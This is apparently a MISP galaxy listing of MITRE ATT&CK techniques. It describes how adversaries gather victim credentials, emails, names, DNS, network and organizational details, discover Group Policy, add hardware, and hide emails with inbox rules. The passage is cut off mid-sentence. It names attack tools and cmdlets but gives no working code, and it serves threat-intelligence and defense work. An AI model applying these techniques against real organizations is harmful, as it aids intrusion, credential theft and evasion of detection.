UUID 4acf57da-73c1-4555-a86a-38ea4a8b962d which can be used as unique global reference for Gather Victim Host Information in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Credentials

Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.

Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via Phishing for Information. Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.[ATT ScanBox] Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: Search Engines, breach dumps, code repositories, etc.).[Register Deloitte][Register Uber][Detectify Slack Tokens][Forbes GitHub Creds][GitHub truffleHog][GitHub Gitrob][CNET Leaks] Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).[Okta Scatter Swine 2022]

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Compromise Accounts), and/or initial access (ex: External Remote Services or Valid Accounts).

Internal MISP references

UUID e5d9c785-61bd-483f-b2ac-5bd9a8641b22 which can be used as unique global reference for Credentials in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1589.001
Related clusters

To see the related clusters, click here.

Email Addresses

Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.

Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).[HackersArise Email][CNET Leaks] Email addresses could also be enumerated via more active means (i.e. Active Scanning), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.[GrimBlog UsernameEnum] For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.[GitHub Office 365 User Enumeration][Azure Active Directory Reconnaisance]

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Email Accounts), and/or initial access (ex: Phishing or Brute Force via External Remote Services).

Internal MISP references

UUID 2eee984c-ea00-4284-b3eb-fd0c603a5a80 which can be used as unique global reference for Email Addresses in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1589.002
Related clusters

To see the related clusters, click here.

Employee Names

Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.

Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).[OPM Leak] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Compromise Accounts), and/or initial access (ex: Phishing or Valid Accounts).

Internal MISP references

UUID 72668851-bf65-42eb-a775-bc607f4520a2 which can be used as unique global reference for Employee Names in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1589.003
Related clusters

To see the related clusters, click here.

Gather Victim Identity Information

Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about users could also be enumerated via other active means (i.e. Active Scanning) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.[GrimBlog UsernameEnum] Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).[OPM Leak][Register Deloitte][Register Uber][Detectify Slack Tokens][Forbes GitHub Creds][GitHub truffleHog][GitHub Gitrob][CNET Leaks]

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Compromise Accounts), and/or initial access (ex: Phishing or Valid Accounts).

Internal MISP references

UUID aea36489-047e-4c4a-ab26-c51fd3556182 which can be used as unique global reference for Gather Victim Identity Information in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

DNS

Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.[Sean Metcalf Twitter DNS Records]

Adversaries may gather this information in various ways, such as querying or otherwise collecting details via DNS/Passive DNS. DNS information may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases).[DNS Dumpster][Circl Passive DNS] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases, Search Open Websites/Domains, or Active Scanning), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services).

Internal MISP references

UUID cb4ec901-fe61-4b44-8ad7-7d3d9a9bc809 which can be used as unique global reference for DNS in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1590.002
Related clusters

To see the related clusters, click here.

Domain Properties

Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: WHOIS).[WHOIS][DNS Dumpster][Circl Passive DNS] Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.[Azure Active Directory Reconnaisance][Office 265 Azure Domain Availability] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases, Search Open Websites/Domains, or Phishing for Information), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: Phishing).

Internal MISP references

UUID ec145032-4b1b-4dbe-85bf-47360e35b0a3 which can be used as unique global reference for Domain Properties in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1590.001
Related clusters

To see the related clusters, click here.

IP Addresses

Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases).[WHOIS][DNS Dumpster][Circl Passive DNS] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services).

Internal MISP references

UUID 5c3c8da1-ed0c-4b79-9794-c2fc55588ad9 which can be used as unique global reference for IP Addresses in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1590.005
Related clusters

To see the related clusters, click here.

Network Security Appliances

Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information.[Nmap Firewalls NIDS] Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases or Search Open Websites/Domains), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services).

Internal MISP references

UUID c60e4f32-d8f0-49e8-b0f7-57a6ae35b8bb which can be used as unique global reference for Network Security Appliances in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1590.006
Related clusters

To see the related clusters, click here.

Network Topology

Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: Search Victim-Owned Websites).[DNS Dumpster] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services).

Internal MISP references

UUID afe743a7-56b0-4ad1-bd36-dd50d64802fc which can be used as unique global reference for Network Topology in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1590.004
Related clusters

To see the related clusters, click here.

Network Trust Dependencies

Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases).[Pentesting AD Forests] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: Trusted Relationship).

Internal MISP references

UUID 454be621-ea64-409c-981f-809f1238e21c which can be used as unique global reference for Network Trust Dependencies in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1590.003
Related clusters

To see the related clusters, click here.

Gather Victim Network Information

Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases).[WHOIS][DNS Dumpster][Circl Passive DNS] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: Trusted Relationship).

Internal MISP references

UUID 58776ca9-0c54-487f-afcc-e7e5b661bd54 which can be used as unique global reference for Gather Victim Network Information in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Business Relationships

Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).[ThreatPost Broadvoice Leak] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Supply Chain Compromise, Drive-by Compromise, or Trusted Relationship).

Internal MISP references

UUID 9bd53629-fa2c-417d-b937-c575504be5b1 which can be used as unique global reference for Business Relationships in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1591.002
Related clusters

To see the related clusters, click here.

Determine Physical Locations

Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: Search Victim-Owned Websites or Social Media).[ThreatPost Broadvoice Leak][SEC EDGAR Search] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Phishing or Hardware Additions).

Internal MISP references

UUID d93b51df-014a-4d46-949a-4b8f796e6cca which can be used as unique global reference for Determine Physical Locations in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1591.001
Related clusters

To see the related clusters, click here.

Identify Business Tempo

Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).[ThreatPost Broadvoice Leak] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Supply Chain Compromise or Trusted Relationship)

Internal MISP references

UUID 1f28a8a5-7231-47ad-9943-73b3cc6d05b0 which can be used as unique global reference for Identify Business Tempo in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1591.003
Related clusters

To see the related clusters, click here.

Identify Roles

Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).[ThreatPost Broadvoice Leak] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Phishing).

Internal MISP references

UUID 63a99eb9-0da7-4286-bfc9-c306a03abf24 which can be used as unique global reference for Identify Roles in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1591.004
Related clusters

To see the related clusters, click here.

Gather Victim Org Information

Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).[ThreatPost Broadvoice Leak][SEC EDGAR Search] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Phishing or Trusted Relationship).

Internal MISP references

UUID e55d2e4b-07d8-4c22-b543-c187be320578 which can be used as unique global reference for Gather Victim Org Information in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Group Policy Discovery

Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path \<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.[TechNet Group Policy Basics][ADSecurity GPO Persistence 2016]

Adversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.[Microsoft gpresult][Github PowerShell Empire] Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. Domain Policy Modification) for their benefit.

Internal MISP references

UUID d97d754d-92d5-4874-bbfe-5aa4d581f2a8 which can be used as unique global reference for Group Policy Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Hardware Additions

Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. Replication Through Removable Media), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.

While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. Adversary-in-the-Middle), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.[Ossmann Star Feb 2011][Aleks Weapons Nov 2015][Frisk DMA August 2016][McMillan Pwn March 2012]

Internal MISP references

UUID 4557bfb9-b940-49b6-b8be-571979134419 which can be used as unique global reference for Hardware Additions in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Email Hiding Rules

Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule PowerShell cmdlets on Windows systems.[Microsoft Inbox Rules][MacOS Email Rules][Microsoft New-InboxRule][Microsoft Set-InboxRule]

Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to Internal Spearphishing emails sent from the compromised account.

Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. [